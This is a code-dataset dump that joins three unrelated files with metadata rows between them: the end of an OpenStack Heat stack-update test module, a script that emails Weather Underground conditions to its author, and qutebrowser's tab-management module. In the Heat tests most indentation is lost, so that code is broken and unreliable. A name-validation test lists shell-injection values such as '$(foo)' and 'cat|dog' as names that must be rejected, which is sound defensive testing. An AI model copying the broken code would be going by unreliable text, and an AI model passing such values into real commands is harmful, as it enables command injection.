self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.assertEqual(self.stack['BResource'].properties['Foo'],
'AResource')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'FnGetRefId')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
# mocks for first (failed update)
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'AResource')
# mock to make the replace fail when creating the replacement resource
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
# mocks for second rollback update
generic_rsrc.GenericResource.handle_update(
tmpl['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
generic_rsrc.GenericResource.handle_create().AndReturn(None)
generic_rsrc.GenericResource.FnGetRefId().MultipleTimes().AndReturn(
'AResource')
self.m.ReplayAll()
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2),
disable_rollback=False)
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.m.VerifyAll()
@stack_delete_after
def test_update_by_reference_and_rollback_2(self):
        '''
        assertion:
        check that rollback still works with dynamic metadata.
        This test fails the second instance.
        '''
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'smelly'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.assertEqual(self.stack['BResource'].properties['Foo'],
'AResource')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'FnGetRefId')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
# mocks for first and second (failed update)
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
br2_snip = {'Type': 'GenericResourceType',
'Properties': {'Foo': 'inst-007'}}
generic_rsrc.GenericResource.handle_update(
br2_snip).AndReturn(
resource.Resource.UPDATE_REPLACE)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'AResource')
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.state_set(self.UPDATE_IN_PROGRESS)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.state_set(self.DELETE_IN_PROGRESS)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.state_set(self.DELETE_COMPLETE)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.properties.validate()
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.state_set(self.CREATE_IN_PROGRESS)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# mock to make the replace fail when creating the second
# replacement resource
generic_rsrc.GenericResource.handle_create().AndReturn(None)
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
# mocks for second rollback update
generic_rsrc.GenericResource.handle_update(
tmpl['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
br2_snip = {'Type': 'GenericResourceType',
'Properties': {'Foo': 'AResource'}}
generic_rsrc.GenericResource.handle_update(
br2_snip).AndReturn(
resource.Resource.UPDATE_REPLACE)
# self.state_set(self.DELETE_IN_PROGRESS)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.state_set(self.DELETE_IN_PROGRESS)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
generic_rsrc.GenericResource.handle_create().AndReturn(None)
generic_rsrc.GenericResource.handle_create().AndReturn(None)
# reverting to AResource
generic_rsrc.GenericResource.FnGetRefId().MultipleTimes().AndReturn(
'AResource')
self.m.ReplayAll()
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2),
disable_rollback=False)
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.m.VerifyAll()
def test_stack_name_valid(self):
stack = parser.Stack(None, 's', parser.Template({}))
stack = parser.Stack(None, 'stack123', parser.Template({}))
stack = parser.Stack(None, 'test.stack', parser.Template({}))
stack = parser.Stack(None, 'test_stack', parser.Template({}))
stack = parser.Stack(None, 'TEST', parser.Template({}))
stack = parser.Stack(None, 'test-stack', parser.Template({}))
def test_stack_name_invalid(self):
self.assertRaises(ValueError, parser.Stack, None, '_foo',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '1bad',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '.kcats',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'test stack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, ' teststack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '^-^',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '\"stack\"',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '1234',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'cat|dog',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '$(foo)',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'test/stack',
parser.Template({}))
        self.assertRaises(ValueError, parser.Stack, None, 'test\\stack',
                          parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'test::stack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'test;stack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'test~stack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '#test',
parser.Template({}))
@stack_delete_after
def test_resource_state_get_att(self):
tmpl = {
'Resources': {'AResource': {'Type': 'GenericResourceType'}},
'Outputs': {'TestOutput': {'Value': {
'Fn::GetAtt': ['AResource', 'Foo']}}
}
}
self.stack = parser.Stack(self.ctx, 'resource_state_get_att',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
self.assertTrue('AResource' in self.stack)
rsrc = self.stack['AResource']
rsrc.resource_id_set('aaaa')
self.assertEqual('AResource', rsrc.FnGetAtt('foo'))
for state in (
rsrc.CREATE_IN_PROGRESS,
rsrc.CREATE_COMPLETE,
rsrc.UPDATE_IN_PROGRESS,
rsrc.UPDATE_COMPLETE):
rsrc.state = state
self.assertEqual('AResource', self.stack.output('TestOutput'))
for state in (
rsrc.CREATE_FAILED,
rsrc.DELETE_IN_PROGRESS,
rsrc.DELETE_FAILED,
rsrc.DELETE_COMPLETE,
rsrc.UPDATE_FAILED,
None):
rsrc.state = state
self.assertEqual(None, self.stack.output('TestOutput'))
rsrc.state = rsrc.CREATE_COMPLETE
| apache-2.0 | 1,009,920,623,515,962,600 | 41.237158 | 79 | 0.574119 | false |
inflatus/Python | Weather/weather_email.py | 1 | 2252 | # using JSON and the WeatherUnderground API
# parsing data and emailing it to myself
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import urllib.request
import json
from API_KEYS import EMAIL_ADDRESS, EMAIL_PASSWORD
from API_KEYS import WEATHER_UNDERGROUND_KEY
# request the current conditions from the Weather Underground API
f = urllib.request.urlopen('http://api.wunderground.com/api/' + WEATHER_UNDERGROUND_KEY + '/geolookup/conditions/q/IN/Martinsville.json')
# decoding the text
json_string = f.read().decode('utf-8')
# parsing the information
parsed_json = json.loads(json_string)
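# The key lookups below assume the response is nested like this
# (illustrative excerpt, not the full payload):
#   {"location": {"city": "..."},
#    "current_observation": {"temp_f": ..., "relative_humidity": "...", ...}}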
location = parsed_json['location']['city']
temp_f = parsed_json['current_observation']['temp_f']
relative_humidity = parsed_json['current_observation']['relative_humidity']
wind_mph = parsed_json['current_observation']['wind_mph']
wind_gust = parsed_json['current_observation']['wind_gust_mph']
pressure_mb = parsed_json['current_observation']['pressure_mb']
feels_like = parsed_json['current_observation']['feelslike_f']
visibility_mi = parsed_json['current_observation']['visibility_mi']
precipitation_in = parsed_json['current_observation']['precip_today_in']
weather = parsed_json['current_observation']['weather']
# compose the weather report body from the parsed fields
data = (('Current temperature in {} is: {} F\n'.format(location, temp_f)) +
('Relative Humidity is at: {}\n'.format(relative_humidity)) +
('Winds are: {} mph\n'.format(wind_mph)) +
('Wind gusts are at: {} mph\n'.format(wind_gust)) +
('Pressure is: {} mb\n'.format(pressure_mb)) +
('Feels like: {} F\n'.format(feels_like)) +
('Visibility is: {} mi\n'.format(visibility_mi)) +
('Precipitation today: {} inches\n'.format(precipitation_in)) +
('General weather is: {}'.format(weather)))
# compose email message
fromaddr = EMAIL_ADDRESS
toaddr = EMAIL_ADDRESS
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Current Weather"
body = data
msg.attach(MIMEText(body, 'plain'))
# authenticate and send email
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, EMAIL_PASSWORD)
text = msg.as_string()
server.sendmail(fromaddr, toaddr, text)
server.quit()
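# Illustrative alternative for the send step (not part of the original
# script): in Python 3, smtplib.SMTP is a context manager, so the connection
# is closed even if sending raises. send_report() is a hypothetical helper
# name invented for this sketch.
def send_report(message):
    """Send a composed MIME message via Gmail's SMTP relay."""
    with smtplib.SMTP('smtp.gmail.com', 587) as server:
        server.starttls()
        server.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
        server.send_message(message)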
| mit | -1,424,017,478,444,561,400 | 36.533333 | 137 | 0.709147 | false |
t-wissmann/qutebrowser | qutebrowser/mainwindow/tabbedbrowser.py | 1 | 40900 | # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2020 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""The main tabbed browser widget."""
import collections
import functools
import weakref
import typing
import attr
from PyQt5.QtWidgets import QSizePolicy, QWidget, QApplication
from PyQt5.QtCore import pyqtSignal, pyqtSlot, QTimer, QUrl
from PyQt5.QtGui import QIcon
from qutebrowser.config import config
from qutebrowser.keyinput import modeman
from qutebrowser.mainwindow import tabwidget, mainwindow
from qutebrowser.browser import signalfilter, browsertab, history
from qutebrowser.utils import (log, usertypes, utils, qtutils, objreg,
urlutils, message, jinja)
from qutebrowser.misc import quitter
@attr.s
class UndoEntry:
"""Information needed for :undo."""
url = attr.ib()
history = attr.ib()
index = attr.ib()
pinned = attr.ib()
class TabDeque:
"""Class which manages the 'last visited' tab stack.
Instead of handling deletions by clearing old entries, they are handled by
checking if they exist on access. This allows us to save an iteration on
every tab delete.
Currently, we assume we will switch to the tab returned by any of the
getter functions. This is done because the on_switch functions will be
called upon switch, and we don't want to duplicate entries in the stack
for a single switch.
"""
def __init__(self) -> None:
self._stack = collections.deque(
maxlen=config.val.tabs.focus_stack_size
) # type: typing.Deque[weakref.ReferenceType[QWidget]]
# Items that have been removed from the primary stack.
self._stack_deleted = [
] # type: typing.List[weakref.ReferenceType[QWidget]]
self._ignore_next = False
self._keep_deleted_next = False
def on_switch(self, old_tab: QWidget) -> None:
"""Record tab switch events."""
if self._ignore_next:
self._ignore_next = False
self._keep_deleted_next = False
return
tab = weakref.ref(old_tab)
if self._stack_deleted and not self._keep_deleted_next:
self._stack_deleted = []
self._keep_deleted_next = False
self._stack.append(tab)
def prev(self, cur_tab: QWidget) -> QWidget:
"""Get the 'previous' tab in the stack.
Throws IndexError on failure.
"""
tab = None # type: typing.Optional[QWidget]
while tab is None or tab.pending_removal or tab is cur_tab:
tab = self._stack.pop()()
self._stack_deleted.append(weakref.ref(cur_tab))
self._ignore_next = True
return tab
def next(self, cur_tab: QWidget, *, keep_overflow=True) -> QWidget:
"""Get the 'next' tab in the stack.
Throws IndexError on failure.
"""
tab = None # type: typing.Optional[QWidget]
while tab is None or tab.pending_removal or tab is cur_tab:
tab = self._stack_deleted.pop()()
# On next tab-switch, current tab will be added to stack as normal.
# However, we shouldn't wipe the overflow stack as normal.
if keep_overflow:
self._keep_deleted_next = True
return tab
def last(self, cur_tab: QWidget) -> QWidget:
"""Get the last tab.
Throws IndexError on failure.
"""
try:
return self.next(cur_tab, keep_overflow=False)
except IndexError:
return self.prev(cur_tab)
def update_size(self) -> None:
"""Update the maxsize of this TabDeque."""
newsize = config.val.tabs.focus_stack_size
if newsize < 0:
newsize = None
# We can't resize a collections.deque so just recreate it >:(
self._stack = collections.deque(self._stack, maxlen=newsize)
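# Illustrative sketch (not part of the original module): a minimal
# walk-through of the TabDeque contract using stand-in objects. _FakeTab and
# _tab_deque_example are hypothetical names invented here, and the sketch
# assumes the config system is initialised so tabs.focus_stack_size is
# readable.
def _tab_deque_example():
    class _FakeTab:
        """Stand-in exposing the one attribute TabDeque checks."""
        pending_removal = False
    deque = TabDeque()
    tab_a, tab_b = _FakeTab(), _FakeTab()
    deque.on_switch(tab_a)               # we switched away from tab_a
    assert deque.prev(tab_b) is tab_a    # go back; tab_b lands on overflow
    assert deque.next(tab_a) is tab_b    # and next() returns to it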
class TabDeletedError(Exception):
"""Exception raised when _tab_index is called for a deleted tab."""
class TabbedBrowser(QWidget):
"""A TabWidget with QWebViews inside.
Provides methods to manage tabs, convenience methods to interact with the
current tab (cur_*) and filters signals to re-emit them when they occurred
in the currently visible tab.
For all tab-specific signals (cur_*) emitted by a tab, this happens:
- the signal gets filtered with _filter_signals and self.cur_* gets
emitted if the signal occurred in the current tab.
Attributes:
search_text/search_options: Search parameters which are shared between
all tabs.
_win_id: The window ID this tabbedbrowser is associated with.
_filter: A SignalFilter instance.
_now_focused: The tab which is focused now.
_tab_insert_idx_left: Where to insert a new tab with
tabs.new_tab_position set to 'prev'.
_tab_insert_idx_right: Same as above, for 'next'.
_undo_stack: List of lists of UndoEntry objects of closed tabs.
shutting_down: Whether we're currently shutting down.
_local_marks: Jump markers local to each page
_global_marks: Jump markers used across all pages
default_window_icon: The qutebrowser window icon
is_private: Whether private browsing is on for this window.
Signals:
cur_progress: Progress of the current tab changed (load_progress).
cur_load_started: Current tab started loading (load_started)
cur_load_finished: Current tab finished loading (load_finished)
cur_url_changed: Current URL changed.
cur_link_hovered: Link hovered in current tab (link_hovered)
cur_scroll_perc_changed: Scroll percentage of current tab changed.
arg 1: x-position in %.
arg 2: y-position in %.
cur_load_status_changed: Loading status of current tab changed.
close_window: The last tab was closed, close this window.
resized: Emitted when the browser window has resized, so the completion
widget can adjust its size to it.
arg: The new size.
current_tab_changed: The current tab changed to the emitted tab.
new_tab: Emits the new WebView and its index when a new tab is opened.
"""
cur_progress = pyqtSignal(int)
cur_load_started = pyqtSignal()
cur_load_finished = pyqtSignal(bool)
cur_url_changed = pyqtSignal(QUrl)
cur_link_hovered = pyqtSignal(str)
cur_scroll_perc_changed = pyqtSignal(int, int)
cur_load_status_changed = pyqtSignal(usertypes.LoadStatus)
cur_fullscreen_requested = pyqtSignal(bool)
cur_caret_selection_toggled = pyqtSignal(bool)
close_window = pyqtSignal()
resized = pyqtSignal('QRect')
current_tab_changed = pyqtSignal(browsertab.AbstractTab)
new_tab = pyqtSignal(browsertab.AbstractTab, int)
def __init__(self, *, win_id, private, parent=None):
if private:
assert not qtutils.is_single_process()
super().__init__(parent)
self.widget = tabwidget.TabWidget(win_id, parent=self)
self._win_id = win_id
self._tab_insert_idx_left = 0
self._tab_insert_idx_right = -1
self.shutting_down = False
self.widget.tabCloseRequested.connect( # type: ignore
self.on_tab_close_requested)
self.widget.new_tab_requested.connect(self.tabopen)
self.widget.currentChanged.connect( # type: ignore
self._on_current_changed)
self.cur_fullscreen_requested.connect(self.widget.tabBar().maybe_hide)
self.widget.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-65223
if qtutils.version_check('5.10', compiled=False):
self.cur_load_finished.connect(self._leave_modes_on_load)
else:
self.cur_load_started.connect(self._leave_modes_on_load)
# This init is never used, it is immediately thrown away in the next
# line.
self._undo_stack = (
collections.deque()
) # type: typing.MutableSequence[typing.MutableSequence[UndoEntry]]
self._update_stack_size()
self._filter = signalfilter.SignalFilter(win_id, self)
self._now_focused = None
self.search_text = None
self.search_options = {} # type: typing.Mapping[str, typing.Any]
self._local_marks = {
} # type: typing.MutableMapping[QUrl, typing.MutableMapping[str, int]]
self._global_marks = {
} # type: typing.MutableMapping[str, typing.Tuple[int, QUrl]]
self.default_window_icon = self.widget.window().windowIcon()
self.is_private = private
self.tab_deque = TabDeque()
config.instance.changed.connect(self._on_config_changed)
quitter.instance.shutting_down.connect(self.shutdown)
def _update_stack_size(self):
newsize = config.instance.get('tabs.undo_stack_size')
if newsize < 0:
newsize = None
# We can't resize a collections.deque so just recreate it >:(
self._undo_stack = collections.deque(self._undo_stack, maxlen=newsize)
def __repr__(self):
return utils.get_repr(self, count=self.widget.count())
@pyqtSlot(str)
def _on_config_changed(self, option):
if option == 'tabs.favicons.show':
self._update_favicons()
elif option == 'window.title_format':
self._update_window_title()
elif option == 'tabs.undo_stack_size':
self._update_stack_size()
elif option in ['tabs.title.format', 'tabs.title.format_pinned']:
self.widget.update_tab_titles()
elif option == "tabs.focus_stack_size":
self.tab_deque.update_size()
def _tab_index(self, tab):
"""Get the index of a given tab.
Raises TabDeletedError if the tab doesn't exist anymore.
"""
try:
idx = self.widget.indexOf(tab)
except RuntimeError as e:
log.webview.debug("Got invalid tab ({})!".format(e))
raise TabDeletedError(e)
if idx == -1:
log.webview.debug("Got invalid tab (index is -1)!")
raise TabDeletedError("index is -1!")
return idx
def widgets(self):
"""Get a list of open tab widgets.
We don't implement this as generator so we can delete tabs while
iterating over the list.
"""
widgets = []
for i in range(self.widget.count()):
widget = self.widget.widget(i)
if widget is None:
log.webview.debug( # type: ignore
"Got None-widget in tabbedbrowser!")
else:
widgets.append(widget)
return widgets
def _update_window_title(self, field=None):
"""Change the window title to match the current tab.
Args:
idx: The tab index to update.
field: A field name which was updated. If given, the title
is only set if the given field is in the template.
"""
title_format = config.cache['window.title_format']
if field is not None and ('{' + field + '}') not in title_format:
return
idx = self.widget.currentIndex()
if idx == -1:
# (e.g. last tab removed)
log.webview.debug("Not updating window title because index is -1")
return
fields = self.widget.get_tab_fields(idx)
fields['id'] = self._win_id
title = title_format.format(**fields)
self.widget.window().setWindowTitle(title)
def _connect_tab_signals(self, tab):
"""Set up the needed signals for tab."""
# filtered signals
tab.link_hovered.connect(
self._filter.create(self.cur_link_hovered, tab))
tab.load_progress.connect(
self._filter.create(self.cur_progress, tab))
tab.load_finished.connect(
self._filter.create(self.cur_load_finished, tab))
tab.load_started.connect(
self._filter.create(self.cur_load_started, tab))
tab.scroller.perc_changed.connect(
self._filter.create(self.cur_scroll_perc_changed, tab))
tab.url_changed.connect(
self._filter.create(self.cur_url_changed, tab))
tab.load_status_changed.connect(
self._filter.create(self.cur_load_status_changed, tab))
tab.fullscreen_requested.connect(
self._filter.create(self.cur_fullscreen_requested, tab))
tab.caret.selection_toggled.connect(
self._filter.create(self.cur_caret_selection_toggled, tab))
# misc
tab.scroller.perc_changed.connect(self._on_scroll_pos_changed)
tab.scroller.before_jump_requested.connect(lambda: self.set_mark("'"))
tab.url_changed.connect(
functools.partial(self._on_url_changed, tab))
tab.title_changed.connect(
functools.partial(self._on_title_changed, tab))
tab.icon_changed.connect(
functools.partial(self._on_icon_changed, tab))
tab.load_progress.connect(
functools.partial(self._on_load_progress, tab))
tab.load_finished.connect(
functools.partial(self._on_load_finished, tab))
tab.load_started.connect(
functools.partial(self._on_load_started, tab))
tab.load_status_changed.connect(
functools.partial(self._on_load_status_changed, tab))
tab.window_close_requested.connect(
functools.partial(self._on_window_close_requested, tab))
tab.renderer_process_terminated.connect(
functools.partial(self._on_renderer_process_terminated, tab))
tab.audio.muted_changed.connect(
functools.partial(self._on_audio_changed, tab))
tab.audio.recently_audible_changed.connect(
functools.partial(self._on_audio_changed, tab))
tab.new_tab_requested.connect(self.tabopen)
if not self.is_private:
tab.history_item_triggered.connect(
history.web_history.add_from_tab)
def current_url(self):
"""Get the URL of the current tab.
Intended to be used from command handlers.
Return:
The current URL as QUrl.
"""
idx = self.widget.currentIndex()
return self.widget.tab_url(idx)
def shutdown(self):
"""Try to shut down all tabs cleanly."""
self.shutting_down = True
        # Reverse tabs so we don't have to recalculate tab titles over and
        # over: removing the first tab causes [2..-1] to be recomputed,
        # while removing the last causes nothing to be recomputed.
for tab in reversed(self.widgets()):
self._remove_tab(tab)
def tab_close_prompt_if_pinned(
self, tab, force, yes_action,
text="Are you sure you want to close a pinned tab?"):
"""Helper method for tab_close.
If tab is pinned, prompt. If not, run yes_action.
If tab is destroyed, abort question.
"""
if tab.data.pinned and not force:
message.confirm_async(
title='Pinned Tab',
text=text,
yes_action=yes_action, default=False, abort_on=[tab.destroyed])
else:
yes_action()
def close_tab(self, tab, *, add_undo=True, new_undo=True):
"""Close a tab.
Args:
tab: The QWebView to be closed.
add_undo: Whether the tab close can be undone.
new_undo: Whether the undo entry should be a new item in the stack.
"""
last_close = config.val.tabs.last_close
count = self.widget.count()
if last_close == 'ignore' and count == 1:
return
self._remove_tab(tab, add_undo=add_undo, new_undo=new_undo)
if count == 1: # We just closed the last tab above.
if last_close == 'close':
self.close_window.emit()
elif last_close == 'blank':
self.load_url(QUrl('about:blank'), newtab=True)
elif last_close == 'startpage':
for url in config.val.url.start_pages:
self.load_url(url, newtab=True)
elif last_close == 'default-page':
self.load_url(config.val.url.default_page, newtab=True)
def _remove_tab(self, tab, *, add_undo=True, new_undo=True, crashed=False):
"""Remove a tab from the tab list and delete it properly.
Args:
tab: The QWebView to be closed.
add_undo: Whether the tab close can be undone.
new_undo: Whether the undo entry should be a new item in the stack.
crashed: Whether we're closing a tab with crashed renderer process.
"""
idx = self.widget.indexOf(tab)
if idx == -1:
if crashed:
return
raise TabDeletedError("tab {} is not contained in "
"TabbedWidget!".format(tab))
if tab is self._now_focused:
self._now_focused = None
tab.pending_removal = True
if tab.url().isEmpty():
# There are some good reasons why a URL could be empty
# (target="_blank" with a download, see [1]), so we silently ignore
# this.
# [1] https://github.com/qutebrowser/qutebrowser/issues/163
pass
elif not tab.url().isValid():
# We display a warning for URLs which are not empty but invalid -
# but we don't return here because we want the tab to close either
# way.
urlutils.invalid_url_error(tab.url(), "saving tab")
elif add_undo:
try:
history_data = tab.history.private_api.serialize()
except browsertab.WebTabError:
pass # special URL
else:
entry = UndoEntry(tab.url(), history_data, idx,
tab.data.pinned)
if new_undo or not self._undo_stack:
self._undo_stack.append([entry])
else:
self._undo_stack[-1].append(entry)
tab.private_api.shutdown()
self.widget.removeTab(idx)
if not crashed:
# WORKAROUND for a segfault when we delete the crashed tab.
# see https://bugreports.qt.io/browse/QTBUG-58698
tab.layout().unwrap()
tab.deleteLater()
def undo(self):
"""Undo removing of a tab or tabs."""
# Remove unused tab which may be created after the last tab is closed
last_close = config.val.tabs.last_close
use_current_tab = False
if last_close in ['blank', 'startpage', 'default-page']:
only_one_tab_open = self.widget.count() == 1
no_history = len(self.widget.widget(0).history) == 1
urls = {
'blank': QUrl('about:blank'),
'startpage': config.val.url.start_pages[0],
'default-page': config.val.url.default_page,
}
first_tab_url = self.widget.widget(0).url()
last_close_urlstr = urls[last_close].toString().rstrip('/')
first_tab_urlstr = first_tab_url.toString().rstrip('/')
last_close_url_used = first_tab_urlstr == last_close_urlstr
use_current_tab = (only_one_tab_open and no_history and
last_close_url_used)
for entry in reversed(self._undo_stack.pop()):
if use_current_tab:
newtab = self.widget.widget(0)
use_current_tab = False
else:
# FIXME:typing mypy thinks this is None due to @pyqtSlot
newtab = typing.cast(
browsertab.AbstractTab,
self.tabopen(background=False, idx=entry.index))
newtab.history.private_api.deserialize(entry.history)
self.widget.set_tab_pinned(newtab, entry.pinned)
@pyqtSlot('QUrl', bool)
def load_url(self, url, newtab):
"""Open a URL, used as a slot.
Args:
url: The URL to open as QUrl.
newtab: True to open URL in a new tab, False otherwise.
"""
qtutils.ensure_valid(url)
if newtab or self.widget.currentWidget() is None:
self.tabopen(url, background=False)
else:
self.widget.currentWidget().load_url(url)
@pyqtSlot(int)
def on_tab_close_requested(self, idx):
"""Close a tab via an index."""
tab = self.widget.widget(idx)
if tab is None:
log.webview.debug( # type: ignore
"Got invalid tab {} for index {}!".format(tab, idx))
return
self.tab_close_prompt_if_pinned(
tab, False, lambda: self.close_tab(tab))
@pyqtSlot(browsertab.AbstractTab)
def _on_window_close_requested(self, widget):
"""Close a tab with a widget given."""
try:
self.close_tab(widget)
except TabDeletedError:
log.webview.debug("Requested to close {!r} which does not "
"exist!".format(widget))
@pyqtSlot('QUrl')
@pyqtSlot('QUrl', bool)
@pyqtSlot('QUrl', bool, bool)
def tabopen(
self, url: QUrl = None,
background: bool = None,
related: bool = True,
idx: int = None,
) -> browsertab.AbstractTab:
"""Open a new tab with a given URL.
Inner logic for open-tab and open-tab-bg.
Also connect all the signals we need to _filter_signals.
Args:
url: The URL to open as QUrl or None for an empty tab.
background: Whether to open the tab in the background.
if None, the `tabs.background` setting decides.
related: Whether the tab was opened from another existing tab.
If this is set, the new position might be different. With
the default settings we handle it like Chromium does:
- Tabs from clicked links etc. are to the right of
the current (related=True).
- Explicitly opened tabs are at the very right
(related=False)
idx: The index where the new tab should be opened.
Return:
The opened WebView instance.
"""
if url is not None:
qtutils.ensure_valid(url)
log.webview.debug("Creating new tab with URL {}, background {}, "
"related {}, idx {}".format(
url, background, related, idx))
prev_focus = QApplication.focusWidget()
if config.val.tabs.tabs_are_windows and self.widget.count() > 0:
window = mainwindow.MainWindow(private=self.is_private)
window.show()
tabbed_browser = objreg.get('tabbed-browser', scope='window',
window=window.win_id)
return tabbed_browser.tabopen(url=url, background=background,
related=related)
tab = browsertab.create(win_id=self._win_id,
private=self.is_private,
parent=self.widget)
self._connect_tab_signals(tab)
if idx is None:
idx = self._get_new_tab_idx(related)
self.widget.insertTab(idx, tab, "")
if url is not None:
tab.load_url(url)
if background is None:
background = config.val.tabs.background
if background:
# Make sure the background tab has the correct initial size.
# With a foreground tab, it's going to be resized correctly by the
# layout anyways.
tab.resize(self.widget.currentWidget().size())
self.widget.tab_index_changed.emit(self.widget.currentIndex(),
self.widget.count())
# Refocus webview in case we lost it by spawning a bg tab
self.widget.currentWidget().setFocus()
else:
self.widget.setCurrentWidget(tab)
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-68076
# Still seems to be needed with Qt 5.11.1
tab.setFocus()
mode = modeman.instance(self._win_id).mode
if mode in [usertypes.KeyMode.command, usertypes.KeyMode.prompt,
usertypes.KeyMode.yesno]:
# If we were in a command prompt, restore old focus
# The above commands need to be run to switch tabs
if prev_focus is not None:
prev_focus.setFocus()
tab.show()
self.new_tab.emit(tab, idx)
return tab
def _get_new_tab_idx(self, related):
"""Get the index of a tab to insert.
Args:
related: Whether the tab was opened from another tab (as a "child")
Return:
The index of the new tab.
"""
if related:
pos = config.val.tabs.new_position.related
else:
pos = config.val.tabs.new_position.unrelated
if pos == 'prev':
if config.val.tabs.new_position.stacking:
idx = self._tab_insert_idx_left
# On first sight, we'd think we have to decrement
# self._tab_insert_idx_left here, as we want the next tab to be
# *before* the one we just opened. However, since we opened a
# tab *before* the currently focused tab, indices will shift by
# 1 automatically.
else:
idx = self.widget.currentIndex()
elif pos == 'next':
if config.val.tabs.new_position.stacking:
idx = self._tab_insert_idx_right
else:
idx = self.widget.currentIndex() + 1
self._tab_insert_idx_right += 1
elif pos == 'first':
idx = 0
elif pos == 'last':
idx = -1
else:
raise ValueError("Invalid tabs.new_position '{}'.".format(pos))
log.webview.debug("tabs.new_position {} -> opening new tab at {}, "
"next left: {} / right: {}".format(
pos, idx, self._tab_insert_idx_left,
self._tab_insert_idx_right))
return idx
def _update_favicons(self):
"""Update favicons when config was changed."""
for tab in self.widgets():
self.widget.update_tab_favicon(tab)
@pyqtSlot()
def _on_load_started(self, tab):
"""Clear icon and update title when a tab started loading.
Args:
tab: The tab where the signal belongs to.
"""
if tab.data.keep_icon:
tab.data.keep_icon = False
else:
if (config.cache['tabs.tabs_are_windows'] and
tab.data.should_show_icon()):
self.widget.window().setWindowIcon(self.default_window_icon)
@pyqtSlot()
def _on_load_status_changed(self, tab):
"""Update tab/window titles if the load status changed."""
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
self.widget.update_tab_title(idx)
if idx == self.widget.currentIndex():
self._update_window_title()
